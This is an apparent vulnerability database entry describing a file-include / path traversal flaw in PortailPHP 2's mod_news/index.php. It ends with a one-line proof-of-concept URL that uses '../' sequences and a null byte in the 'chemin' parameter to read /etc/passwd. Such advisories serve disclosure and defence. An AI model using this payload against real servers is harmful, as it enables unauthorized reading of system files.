PortailPHP 2 mod_news/index.php chemin Parameter Traversal Arbitrary File Access

2014-07-01T00:00:00
ID SSV:83054
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/22381/info

PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.

A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.

PortailPHP 2 is vulnerable to these issues; other versions may also be affected. 

http://www.example.commod_news/index.php?chemin=../../../../../../../../../../../../../etc/passwd%00